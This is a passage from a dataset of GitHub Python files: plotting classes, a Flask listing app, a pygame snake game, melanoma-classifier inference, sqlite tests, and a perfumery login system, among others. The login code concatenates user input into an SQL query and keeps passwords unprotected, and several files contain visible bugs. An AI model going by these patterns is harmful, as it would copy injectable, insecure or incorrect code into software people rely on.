leading_digit - last_digit\n\n if significant_digit > 6:\n # Overlap should be handled\n _f = np.sign(f) * (np.abs(f) % (10 ** (last_digit + 6)))\n if leading_digit > 6 or last_digit < -6 or force_latex:\n df = '{f:.6E}'.format(f=_f)\n elif last_digit >= 0:\n df = '{f:.f}'.format(f=_f)\n else:\n df = '{f:.{decimal:d}f}'.format(decimal=-last_digit, f=_f)\n elif significant_digit > 2:\n if leading_digit > 6 or last_digit < -6 or force_latex:\n df = '{f:.{sd:d}E}'.format(sd=significant_digit, f=f)\n elif last_digit >= 0:\n df = '{f:.f}'.format(f=f)\n else:\n df = '{f:.{decimal:d}f}'.format(decimal=-last_digit, f=f)\n else:\n if leading_digit > 4 or last_digit < -4 or force_latex:\n df = '{f:.2E}'.format(f=f)\n else:\n df = '{f:.2f}'.format(f=f)\n if \"E\" in df:\n base, exponent = df.split(\"E\")\n df = r\"{0} \\times 10^{{{1}}}\".format(base, int(exponent))\n return df + unit\n\n\nclass FlatModelPlotter(Plotter):\n def __init__(self, **kwargs):\n self.calculate_map = True\n self.ttl2d = 'Flat Model Energy Surface'\n ref = -129.5\n self.xlim2d = np.array([-1.2, 1.2])\n self.ylim2d = np.array([-1.2, 1.2])\n self.cmp2d = 'cividis'\n self.alp2d = 0.5\n self.xlimGMu = np.array([-1.2, 1.2])\n self.ylimGMu = np.array([-1.2, 1.2])\n self.cmpGMu = 'cividis'\n self.lvls2d = np.linspace(-0.2, 0.2, 15) + ref\n self.lvlsGMu = np.linspace(-0.2, 0.2, 15) + ref\n self.cmpGCov = 'plasma'\n self.lvlsGCov = np.linspace(0, 2, 15)\n self.pbc = np.array([False, False])\n self.energy_range = tuple(np.array([-0.5, 0.5]) + ref)\n self.quiver_scale = 3\n self.ylimHE = tuple(np.array([-0.5, 0.5]) + ref)\n self.ylimTE = (0, 1)\n\n super().__init__(**kwargs)\n\n\nclass AlanineDipeptidePlotter(Plotter):\n def __init__(self, **kwargs):\n self.calculate_map = False\n self.conformation = 180 / np.pi\n self.translation = 0.\n self.pbc = np.array([True, True])\n self.energy_digit = -2\n\n self.ttl2d = 'Alanine Dipeptide Potential Energy Surface'\n self.xlim2d = np.array([-np.pi, np.pi])\n self.ylim2d = np.array([-np.pi, np.pi])\n self.cmp2d = 'cividis'\n self.alp2d = 0.5\n self.xlimGMu = np.array([-np.pi, np.pi])\n self.ylimGMu = np.array([-np.pi, np.pi])\n self.cmpGMu = 'cividis'\n self.lvls2d = np.linspace(-130, -129, 20)\n self.lvlsGMu = np.linspace(-130, -129, 20)\n self.cmpGCov = 'plasma'\n self.lvlsGCov = np.linspace(0, 2, 15)\n self.energy_range = (-130, -129)\n self.ylimHE = (-130, -129)\n self.ylimTE = (0, 1)\n self.quiver_scale = 100\n\n super().__init__(**kwargs)\n\n\nclass MalonaldehydePlotter(Plotter):\n def __init__(self, **kwargs):\n self.calculate_map = False\n self.conformation = 1\n self.translation = 0.\n self.pbc = np.array([False, False])\n self.energy_digit = -2\n\n self.ttl2d = 'Malonaldehyde Potential Energy Surface'\n self.xlim2d = np.array([-0.6, 0.6])\n self.ylim2d = np.array([1.1, 1.4])\n self.cmp2d = 'cividis'\n self.alp2d = 0.5\n self.xlimGMu = np.array([-0.6, 0.6])\n self.ylimGMu = np.array([1.1, 1.4])\n self.cmpGMu = 'cividis'\n self.lvls2d = np.linspace(-53.7, -52, 20)\n self.lvlsGMu = np.linspace(-53.7, -52, 20)\n self.cmpGCov = 'plasma'\n self.lvlsGCov = np.linspace(0, 2, 15)\n self.energy_range = (-53.7, -52)\n self.ylimHE = (-53.7, -52)\n self.ylimTE = (0, 1)\n self.quiver_scale = 100\n\n super().__init__(**kwargs)\n\n\nclass HafniumDioxidePlotter(Plotter):\n def __init__(self, **kwargs):\n self.calculate_map = False\n self.conformation = 180 / np.pi\n self.translation = 0.\n self.pbc = np.array([True, True])\n self.energy_digit = -2\n\n self.ttl2d = 'Alanine Dipeptide Potential Energy Surface'\n self.xlim2d = np.array([-np.pi, np.pi])\n self.ylim2d = np.array([-np.pi, np.pi])\n self.cmp2d = 'cividis'\n self.alp2d = 0.5\n self.xlimGMu = np.array([-np.pi, np.pi])\n self.ylimGMu = np.array([-np.pi, np.pi])\n self.cmpGMu = 'cividis'\n self.lvls2d = np.linspace(-130, -129, 20)\n self.lvlsGMu = np.linspace(-130, -129, 20)\n self.cmpGCov = 'plasma'\n self.lvlsGCov = np.linspace(0, 2, 15)\n self.energy_range = (-130, -129)\n\n super().__init__(**kwargs)\n\n\nclass PeriodicModel2Plotter(Plotter):\n def __init__(self, **kwargs):\n self.calculate_map = True\n self.conformation = 180 / np.pi\n self.translation = 0.\n self.pbc = np.array([True, True])\n self.energy_digit = -2\n\n self.ttl2d = 'Alanine Dipeptide Potential Energy Surface'\n self.xlim2d = np.array([-np.pi, np.pi])\n self.ylim2d = np.array([-np.pi, np.pi])\n self.cmp2d = 'cividis'\n self.alp2d = 0.5\n self.xlimGMu = np.array([-np.pi, np.pi])\n self.ylimGMu = np.array([-np.pi, np.pi])\n self.cmpGMu = 'cividis'\n self.lvls2d = np.linspace(-130, -129, 20)\n self.lvlsGMu = np.linspace(-130, -129, 20)\n self.cmpGCov = 'plasma'\n self.lvlsGCov = np.linspace(0, 2, 15)\n self.energy_range = (-130, -129)\n self.quiver_scale = 100\n\n super().__init__(**kwargs)\n","repo_name":"schinavro/taps","sub_path":"taps/visualize/plotter.py","file_name":"plotter.py","file_ext":"py","file_size_in_byte":39750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28251253561","text":"from flask import Flask, render_template, jsonify, request, abort\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom sqlalchemy import or_, and_\nimport os, re\n\napp = Flask(__name__)\napp.config.from_object(os.environ['APP_SETTINGS'])\ndb = SQLAlchemy(app)\n\nfrom models import *\n\n\n@app.route('/index')\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/search', methods=['GET'])\ndef search():\n term = request.args.get('name', '')\n houses = House.query.filter(House.name.like(\"%\" + term + \"%\")).all()\n # houses = House.query.all()\n return jsonify(houses=[house.serialize for house in houses])\n\n\n@app.route('/update')\ndef update():\n northEast = request.args.get('ne', '')\n southWest = request.args.get('sw', '')\n reg = re.compile(r'^-?\\d+(?:\\.\\d+)?,-?\\d+(?:\\.\\d+)?$')\n if not (southWest and northEast):\n abort(400)\n if not (reg.match(southWest) and reg.match(northEast)):\n abort(400)\n northEastLat = northEast.split(',')[0]\n northEastLong = northEast.split(',')[1]\n southWestLat = southWest.split(',')[0]\n southWestLong = southWest.split(',')[1]\n houses = []\n if southWestLong <= northEastLong:\n houses = House.query.filter(and_(and_(House.latitude <= southWestLat, House.latitude <= northEastLat), and_(\n House.longitude <= southWestLong, House.longitude <= northEastLong))).all()\n else:\n houses = House.query.filter(and_(and_(House.latitude <= southWestLat, House.latitude <= northEastLat), or_(\n House.longitude <= southWestLong, House.longitude <= northEastLong))).all()\n return jsonify(houses=[house.serialize for house in houses])\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\")\n","repo_name":"makafanpeter/houselisting","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40308559679","text":"import boto3\n\nclient = boto3.client('ec2')\n\nclient.revoke_security_group_egress(\n GroupId='security_grp_Id',\n IpPermissions=[\n {\n 'FromPort': 80,\n 'IpProtocol': 'tcp',\n 'IpRanges': [\n {\n 'CidrIp': '0.0.0.0/0',\n 'Description': '_existing_description'\n },\n ],\n 'ToPort': 80,\n },\n ],\n)","repo_name":"SethuKarthick/aws_automation_using_boto3_python","sub_path":"remove_outbound_rule.py","file_name":"remove_outbound_rule.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43109578848","text":"import tkinter as interfaz\nfrom tkinter import ttk\n\nraiz = interfaz.Tk()\nraiz.geometry(\"300x300\")\n\nmarco = interfaz.Frame(raiz)\nmarco.pack()\n\ndesplegable = ttk.Combobox(marco)\ndesplegable['values']= ['uno','dos','tres','cuatro','cinco','seis','siete']\ndesplegable.pack()\n\n\n\n\n","repo_name":"jocarsa/python","sub_path":"203-Tkinteravanzado/002-Widgets/001-combobox.py","file_name":"001-combobox.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37646067797","text":"import pygame\nimport sys\n\nfrom snake_food import SnakeFood\nfrom turnPoint import TurnPoint\nfrom snake import Snake\nfrom pygame.sprite import Group\n\ndef check_events(ai_settings, screen, stats, snakes, snakeHead):\n \"\"\"Respond to keypresses and mouse events\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n check_keydown_events(ai_settings, screen, event, stats,\n snakes, snakeHead)\n\ndef check_keydown_events(ai_settings, screen, event, stats, snakes, snakeHead):\n \"\"\"Respond to keypress.\"\"\"\n if snakeHead.lock:\n if event.key == pygame.K_RIGHT:\n if not snakeHead.moving_right and not snakeHead.moving_left:\n snakeHead.moving_right = True\n snakeHead.moving_left = snakeHead.moving_down = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 1)\n elif event.key == pygame.K_LEFT:\n if not snakeHead.moving_right and not snakeHead.moving_left:\n snakeHead.moving_left = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 2)\n elif event.key == pygame.K_DOWN:\n if not snakeHead.moving_down and not snakeHead.moving_up:\n snakeHead.moving_down = True\n snakeHead.moving_right = snakeHead.moving_left = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 3)\n elif event.key == pygame.K_UP:\n if not snakeHead.moving_down and not snakeHead.moving_up:\n snakeHead.moving_up = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_left = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 4)\n elif event.key == pygame.K_s:\n snakeHead.moving_down = snakeHead.moving_right = snakeHead.moving_left = \\\n snakeHead.moving_up = False\n elif event.key == pygame.K_q:\n sys.exit()\n\n if not snakeHead.lock:\n if event.key == pygame.K_RIGHT:\n if not snakeHead.moving_right:\n snakeHead.moving_right = True\n snakeHead.moving_left = snakeHead.moving_down = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 1)\n elif event.key == pygame.K_LEFT:\n if not snakeHead.moving_left:\n snakeHead.moving_left = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 2)\n elif event.key == pygame.K_DOWN:\n if not snakeHead.moving_down:\n snakeHead.moving_down = True\n snakeHead.moving_right = snakeHead.moving_left = snakeHead.moving_up = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 3)\n elif event.key == pygame.K_UP:\n if not snakeHead.moving_up:\n snakeHead.moving_up = True\n snakeHead.moving_right = snakeHead.moving_down = snakeHead.moving_left = False\n establish_movePoint(ai_settings, screen, snakeHead, snakes, 4)\n elif event.key == pygame.K_s:\n snakeHead.moving_down = snakeHead.moving_right = snakeHead.moving_left = \\\n snakeHead.moving_up = False\n elif event.key == pygame.K_q:\n sys.exit()\n\ndef establish_movePoint(ai_settings, screen, snakeHead, snakes, direction):\n movePointX = snakeHead.center\n movePointY = snakeHead.y\n\n new_turnPoint = TurnPoint(ai_settings, screen, movePointX, movePointY, direction)\n\n for snake in snakes:\n if not snake.head:\n snake.turnPoints.add(new_turnPoint) # Adds only new turn points\n\n\n\n\n\ndef enlarge_snake(ai_settings, screen, stats, snakes, snakeList, food, snakeColor):\n\n snake_body = Snake(ai_settings, screen, stats)\n\n snake_body.color = snakeColor\n\n snake_body.moving_left = snakeList[-1].moving_left\n snake_body.moving_down = snakeList[-1].moving_down\n snake_body.moving_right = snakeList[-1].moving_right\n snake_body.moving_up = snakeList[-1].moving_up\n\n snake_body.y = snakeList[-1].y\n snake_body.center = snakeList[-1].center\n\n for turnPoint in snakeList[-1].turnPoints:\n snake_body.turnPoints.add(turnPoint)\n\n if (snakeList[-1].moving_up):\n snake_body.y += 25\n if snakeList[-1].head:\n snake_body.y += 15\n elif (snakeList[-1].moving_down):\n snake_body.y -= 25\n if snakeList[-1].head:\n snake_body.y -= 15\n elif (snakeList[-1].moving_left):\n snake_body.center += 25\n if snakeList[-1].head:\n snake_body.center += 15\n elif (snakeList[-1].moving_right):\n snake_body.center -= 25\n if snakeList[-1].head:\n snake_body.center -= 15\n\n if(stats.score < 3):\n snake_body.head2 = True\n\n # Add to the group\n snake_body.add(snakes)\n # snakes.add(snake_body) # This doesn't seem to be working\n snakeList.append(snake_body) ## This is working\n snakes.update()\n\n # update_snake(ai_settings, stats, screen, snakes, food)\n\ndef spawn_food(ai_settings, screen, stats, snake, food):\n\n if(len(food) < 2): # So far this works\n snake_food = SnakeFood(ai_settings, screen, stats, snake)\n food.add(snake_food)\n\ndef check_turning_point(ai_settings, screen, snake, food):\n if not snake.head:\n for turnPoint in snake.turnPoints:\n if (snake.center == turnPoint.rect.x and snake.y == turnPoint.rect.y):\n snake.stop()\n snake.center = turnPoint.center\n snake.y = turnPoint.y\n\n snake.moving_left = turnPoint.left\n snake.moving_right = turnPoint.right\n snake.moving_up = turnPoint.up\n snake.moving_down = turnPoint.down\n turnPoint.remove(snake.turnPoints)\n\n\n\ndef check_snake_bottom(screen, stats, snakeHead):\n \"\"\"Check to see if the snake is at the bottom\"\"\"\n screen_rect = screen.get_rect()\n\n if(snakeHead.rect.right >= screen_rect.right or\n snakeHead.rect.left <= 0 or\n snakeHead.rect.y <= 0 or\n snakeHead.rect.y >= snakeHead.ai_settings.screen_height - 20):\n\n stats.game_active = False\n pygame.mouse.set_visible(True)\n\n\n\ndef update_snake(ai_settings, stats, screen, snakes, food):\n for snake in snakes:\n check_turning_point(ai_settings, screen, snake, food)\n\n\ndef check_snakeHead_food_collisions(ai_settings, stats, sb, screen,\n snakeHead, snakes, snakeBody, food):\n \"\"\"Check to see if the head of the snake bumpeed into food\"\"\"\n\n if pygame.sprite.spritecollideany(snakeHead, food):\n\n foodPart = pygame.sprite.spritecollideany(snakeHead, food)\n\n # Remermber food part is a food, we have to convert it to a snake part\n foodPart.remove(food)\n color = foodPart.color\n\n enlarge_snake(ai_settings, screen, stats, snakes, snakeBody, food, color)\n\n stats.score += 1\n sb.prep_score()\n\n check_high_score(stats, sb)\n\ndef check_snake_collisions(stats, snakeHead, snakes):\n snakeBody = snakes.copy()\n\n for snake in snakes:\n if snake.head or snake.head2: # The second part of this doesn't work yet\n snakeBody.remove(snake)\n\n if pygame.sprite.spritecollideany(snakeHead, snakeBody):\n\n stats.game_active = False\n pygame.mouse.set_visible(True)\n\ndef update_screen(ai_settings, screen, sb, snake, food, snakeHead):\n \"\"\"Update thescreen constantly\"\"\"\n\n # Redraw the screen during each loop. Make sure this is first\n screen.fill(ai_settings.black)\n\n # Draw the score\n sb.show_score()\n\n if sb.stats.score > 0 and not snakeHead.lock:\n snakeHead.lock = True\n\n\n # Draw the snake\n for snake_piece in snake.sprites():\n snake_piece.blitme()\n # if not snake_piece.head:\n for turnPoint in snake_piece.turnPoints:\n turnPoint.blitme()\n\n\n # Draw the snake food\n for snake_food in food.sprites():\n snake_food.blitme()\n\n # Make the most recently drawn screen visible\n pygame.display.flip() # Really need this for the screen to update\n\n\n\ndef check_high_score(stats, sb):\n \"\"\"Check high score\"\"\"\n if stats.score > stats.high_score:\n stats.high_score = stats.score\n sb.prep_high_score()","repo_name":"JeaneC/jsnake","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":8669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34935039889","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport multiprocessing\n\nimport albumentations as A\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom cv2 import imread\nfrom geffnet import create_model\nfrom pandas import DataFrame\nfrom pandas import concat\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Dataset\nfrom tqdm import tqdm\n\n# kernel_type = '9c_b7_1e_640_ext_15ep'\n# enet_type = 'efficientnet-b7'\n\nkernel_type = '9c_b6ns_640_ext_15ep'\nenet_type = 'efficientnet-b6'\n\nimage_size = 640\nuse_amp = False\nbatch_size = 32\nnum_workers = multiprocessing.cpu_count()\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nout_dim = 9\nALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'tif', 'dcm'}\n\nCLASS_NAMES = {0: 'AK',\n 1: 'BCC',\n 2: 'BKL',\n 3: 'DF',\n 4: 'SCC',\n 5: 'VASC',\n 6: 'melanoma',\n 7: 'nevus',\n 8: 'unknown'}\n\nuse_meta = False\nuse_external = '_ext' in kernel_type\nmel_idx = 6\n\ntransforms_val = A.Compose([\n A.Resize(image_size, image_size),\n A.Normalize()\n])\n\n\nclass SIIMISICDataset(Dataset):\n def __init__(self, csv, split, mode, transform=None):\n\n self.csv = csv.reset_index(drop=True)\n self.split = split\n self.mode = mode\n self.transform = transform\n\n def __len__(self):\n return self.csv.shape[0]\n\n def __getitem__(self, index):\n row = self.csv.iloc[index]\n\n image = imread(row.filepath)\n image = image[:, :, ::-1]\n\n if self.transform is not None:\n res = self.transform(image=image)\n image = res['image'].astype(np.float32)\n else:\n image = image.astype(np.float32)\n\n image = image.transpose(2, 0, 1)\n\n if self.mode == 'test':\n return torch.tensor(image).float()\n else:\n return torch.tensor(image).float(), torch.tensor(self.csv.iloc[index].target).long()\n\n\nclass enetv2(nn.Module):\n \"\"\"Model\"\"\"\n\n def __init__(self, backbone, out_dim, n_meta_features=0, load_pretrained=False):\n super(enetv2, self).__init__()\n self.n_meta_features = n_meta_features\n self.enet = create_model(enet_type.replace('-', '_'), pretrained=load_pretrained)\n self.dropout = nn.Dropout(0.5)\n\n in_ch = self.enet.classifier.in_features\n self.myfc = nn.Linear(in_ch, out_dim)\n self.enet.classifier = nn.Identity()\n\n def extract(self, x):\n x = self.enet(x)\n return x\n\n def forward(self, x, x_meta=None):\n x = self.extract(x).squeeze(-1).squeeze(-1)\n x = self.myfc(self.dropout(x))\n return x\n\n\ndef get_trans(img, I):\n if I >= 4:\n img = img.transpose(2, 3)\n if I % 4 == 0:\n return img\n elif I % 4 == 1:\n return img.flip(2)\n elif I % 4 == 2:\n return img.flip(3)\n elif I % 4 == 3:\n return img.flip(2).flip(3)\n\n\ndef val_epoch(loader, n_test=1, get_output=False, model_list=None):\n \"\"\"Validation Function\"\"\"\n if model_list is None:\n model_list = []\n LOGITS = []\n PROBS = []\n with torch.no_grad():\n for (data) in tqdm(loader):\n if use_meta:\n data, meta = data\n # data, meta, target = data.to(device), meta.to(device), target.to(device)\n # logits = torch.zeros((data.shape[0], out_dim)).to(device)\n # probs = torch.zeros((data.shape[0], out_dim)).to(device)\n # for I in range(n_test):\n # l = model(get_trans(data, I), meta)\n # logits += l\n # probs += l.softmax(1)\n else:\n data = data.to(device)\n logits = torch.zeros((data.shape[0], out_dim)).to(device)\n probs = torch.zeros((data.shape[0], out_dim)).to(device)\n for model in model_list:\n for I in range(n_test):\n l = model(get_trans(data, I))\n logits += l\n probs += l.softmax(1)\n logits /= n_test\n probs /= n_test\n probs /= len(model_list)\n\n LOGITS.append(logits.detach().cpu())\n PROBS.append(probs.detach().cpu())\n\n LOGITS = torch.cat(LOGITS).numpy()\n PROBS = torch.cat(PROBS).numpy()\n if get_output:\n return LOGITS, PROBS\n else:\n return None\n\n\ndef predict_melanoma(image_locs, model_list=None):\n dfs, dfs_split = [], []\n df_val = DataFrame(image_locs, columns=['filepath'])\n\n dataset_valid = SIIMISICDataset(df_val, 'train', mode='test', transform=transforms_val)\n valid_loader = torch.utils.data.DataLoader(dataset_valid, batch_size=batch_size, num_workers=num_workers)\n\n this_LOGITS, this_PROBS = val_epoch(valid_loader, n_test=8, get_output=True, model_list=model_list)\n dfs.append(df_val)\n\n dfs = concat(dfs)\n # dfs['pred'] = np.concatenate([this_PROBS]).squeeze()[:, mel_idx]\n # dfs['pred'] = this_PROBS\n # dfs['logits'] = this_LOGITS\n # print('dfs', dfs)\n return dfs, this_PROBS, this_LOGITS\n\n\ndef ensemble(dfs_split, LOGITS, len=0):\n \"\"\"Doing ensembling\"\"\"\n single_df = None\n preds_long = [0 for i in range(len)]\n for d in dfs_split:\n if single_df is None:\n single_df = d\n for i, d_ in enumerate(d['pred']):\n preds_long[i] += d_\n\n preds_long = [i / len for i in preds_long]\n preds_long = DataFrame(preds_long, columns=['pred'])\n single_df = concat([single_df['filepath'], preds_long], axis=1)\n return single_df, np.mean(LOGITS, axis=0)\n","repo_name":"Ramstein/MelanomaClassification","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40506172637","text":"from aoc.util.coordinate import Turtle, TurtleDirection\nfrom aoc.util.inputs import Input\n\n\nclass Y2016D1(object):\n def __init__(self, file_name):\n line = Input(file_name).line()\n\n self.moves = line.split(', ')\n\n def part1(self):\n turtle = Turtle(direction=TurtleDirection.NORTH)\n\n for move in self.moves:\n if move[0] == 'R':\n turtle = turtle.turn_right()\n else:\n turtle = turtle.turn_left()\n\n turtle = turtle.forward(int(move[1:]))\n\n result = abs(turtle.coordinate.x) + abs(turtle.coordinate.y)\n\n print(\"Part 1:\", result)\n\n def part2(self):\n seen = set()\n turtle = Turtle(direction=TurtleDirection.NORTH)\n seen.add(turtle.coordinate)\n\n result = 0\n for move in self.moves:\n if result != 0:\n break\n if move[0] == 'R':\n turtle = turtle.turn_right()\n else:\n turtle = turtle.turn_left()\n\n for _ in range(int(move[1:])):\n turtle = turtle.forward()\n if turtle.coordinate in seen:\n result = abs(turtle.coordinate.x) + abs(turtle.coordinate.y)\n break\n seen.add(turtle.coordinate)\n\n print(\"Part 2:\", result)\n\n\nif __name__ == '__main__':\n code = Y2016D1(\"2016/1.txt\")\n code.part1()\n code.part2()\n","repo_name":"Jnesselr/AdventOfCode","sub_path":"aoc/y2016/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12856157420","text":"import pytest\nfrom store.sqlite import SqliteStore, ReadError\nfrom utils import parse_title\nfrom random import randint\n\n@pytest.fixture\ndef notes():\n notes = ['Lorem Ipsum\\nLorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.',\n 'Section 1.10.32 of \"de Finibus Bonorum et Malorum\", written by Cicero in 45 BC\\nSed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo.',\n '1914 translation by H. Rackham\\nBut I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born and I will give you a complete account of the system, and expound the actual teachings of the great explorer of the truth, the master-builder of human happiness.']\n return notes\n\n# Set up a db in memory\n@pytest.fixture\ndef db():\n db = SqliteStore(\":memory:\")\n return db\n\ndef test_add_notes(db, notes):\n for note in notes:\n title, _ = db.add_note(note)\n assert title == parse_title(note)\n\ndef test_empty_query(db, notes):\n data = [db.add_note(note) for note in notes]\n for title, uid in db.query(''):\n assert (title, uid) in data\n\ndef test_nonempty_text_query(db, notes):\n data = [db.add_note(note) for note in notes]\n assert data != None\n for _, uid in data:\n assert db.get_text(uid) != ''\n\ndef test_wrong_id_exception(db, notes):\n for note in notes:\n db.add_note(note)\n with pytest.raises(ReadError):\n db.get_text(randint(1,100000))\n\ndef test_lorem_query(db, notes):\n for note in notes:\n db.add_note(note)\n assert 'Lorem Ipsum' in [title for title, _ in db.query('lorem')]\n","repo_name":"apodda/NotebookPy","sub_path":"test_sqlite.py","file_name":"test_sqlite.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41792420346","text":"# -*- coding: utf-8 -*-\n# __file__ : elasticsearch_01.py\n# __time__ : 2020/7/13 9:40 AM\n\nfrom elasticsearch import Elasticsearch, client\nfrom datetime import datetime\n\n# 启动 elasticsearch 服务端\n# 客户端连接\nes = Elasticsearch(hosts='localhost:8080')\n# es.indices.create(index='index', ignore=400) # 会将该 index 接口的返回值设为索引,不支持 datetime 格式(为了速度)\n# 创建索引\nresp = es.indices.create(\n index=\"index\",\n body={\n \"settings\": {\n \"index\": {\"number_of_shards\": 3, \"number_of_replicas\": 2}\n }\n },\n)\nprint(resp)\n# 索引分区并将 body 存入\nes.index(index='index', id=42, body={\"any\": \"data\", \"timestamp\": datetime.now()})\n# 获取索引中存储的数据\nes.get(index=\"index\", id=42)['_source']\n","repo_name":"zuanzuanshao/ModuleStudy","sub_path":"aioelasticsearch_study/elasticsearch_01.py","file_name":"elasticsearch_01.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"37071419058","text":"import aiofiles\nimport json\n\n\nclass FileUtil:\n def __init__(self, file_path, is_json=True):\n self.file_path = file_path\n self.is_json = is_json\n\n # Read data from specified file\n async def read(self):\n async with aiofiles.open(self.file_path, mode='r') as file:\n contents = await file.read()\n\n if self.is_json:\n return json.loads(contents)\n else:\n return contents\n\n # Write data to specified file\n async def write(self, data):\n async with aiofiles.open(self.file_path, mode='w') as file:\n if self.is_json:\n content = json.dumps(data)\n else:\n content = data\n await file.write(content)\n\n return content","repo_name":"nscharrenberg/CompSec","sub_path":"Server/fileutils.py","file_name":"fileutils.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36612308870","text":"import sqlite3\nfrom funcionalidades import *\nfrom funcionarios import *\nfrom produtos import *\n\"\"\" \nO processo e as informações de login deveriam receber os devidos tratamentos criptograficos, para armazenamento seguro no banco de dados. Mas para esta tarefa não quis utilizar de bibliotecas que não fossem instaladas por padrão exceto o sqlite3 que é obrigatória para a atividade e que eu tenho certeza absoluta de que o professor possui instalada.\n\"\"\"\n\n# Conexão com SGDB\nconn = sqlite3.connect(\"Perfumaria.db\")\ncursor = conn.cursor()\n\nprint(\"\"\"===============================================\n=== Sistema de banco de dados da Perfumaria ===\n======= Realize o Login para ter acesso =======\n===============================================\"\"\")\n\nwhile True:\n\n login = input(\"\\n(000) para sair\\nLogin: \")\n \n if login == \"000\":\n break\n \n senha = input(\"Senha: \")\n \n try: \n cursor.execute(\"SELECT senha FROM funcionario WHERE login='\"+login+\"'\")\n senha_db = cursor.fetchone()\n conn.close\n \n if senha == senha_db[0]:\n print(\"\\nLogin bem sucedido como:\", login)\n n = 0\n \n while True:\n esc = input(\"\\n==============================\\nO que deseja usar?\\n(1) Listagens/consultas de estoque\\n(2) Gerência de estoque\\n(3) Gerência de funcionários [apenas admin]\\n(000) Fazer logout\\n\\n>> \")\n \n if esc == \"1\":\n func()\n \n elif esc == \"2\":\n produtos()\n \n elif (login == \"ADMIN\") and (esc == \"3\"):\n funcionarios()\n \n elif esc == \"000\":\n break\n \n else:\n print(\"\\n!!!Opção inválida!!!\")\n\n else:\n print(\"\\n\\nConjunto login e senha inexistente.\\nContate o admin do sistema para se cadastrar ou confira os dados e tente novamente.\\n\")\n \n except: \n print(\"\\n\\nConjunto login e senha inexistente.\\nContate o admin do sistema para se cadastrar ou confira os dados e tente novamente.\\n\")\n \n","repo_name":"Tchizus/Sistema-Perfumaria-ABC","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22139554639","text":"#!/usr/bin/python3\n\"\"\" Divide elements of a matrix \"\"\"\n\n\ndef matrix_divided(matrix, div):\n if type(matrix) is not list:\n raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\")\n raise TypeError(\"Each row of the matrix must have the same size\")\n if type(div) is not int and type(div) is not float:\n raise TypeError(\"div must be a number\")\n if div == 0:\n raise ZeroDivisionError(\"division by zero\")\n if len(matrix) < 1:\n raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\")\n for i in matrix:\n if type(i) != list:\n raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\")\n length = len(matrix[0])\n if length != len(i):\n raise TypeError(\"Each row of the matrix must have the same size\")\n for j in i:\n if type(j) != int and type(j) != float:\n raise TypeError(\"matrix must be a matrix (list of lists)\\\n of integers/floats\") \n TypeError(\"Each row of the matrix must have the same size\")\n return(list(map(lambda i: list(map(\n lambda j: round(j / div, 2), i)), matrix)))\n","repo_name":"PEDA-ALPHA1/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/2-matrix_divided.py","file_name":"2-matrix_divided.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25807439485","text":"\n# Demyanchuk is learning\nimport scipy as sp\nimport matplotlib.pyplot as plt\n\nPATH = 